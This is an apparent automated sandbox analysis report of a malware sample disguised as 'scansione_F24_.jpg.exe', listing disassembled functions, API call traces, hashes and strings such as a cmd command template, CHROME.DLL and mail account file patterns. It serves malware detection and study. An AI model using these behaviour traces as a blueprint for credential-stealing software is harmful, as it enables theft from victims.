  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68428

General

Root Process Name:d3d8sext.exe
Process MD5:E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:156
Initial Analysis Report:Open
Initial sample Analysis ID:68428
Initial sample SHA 256:9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:scansione_F24_.jpg.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
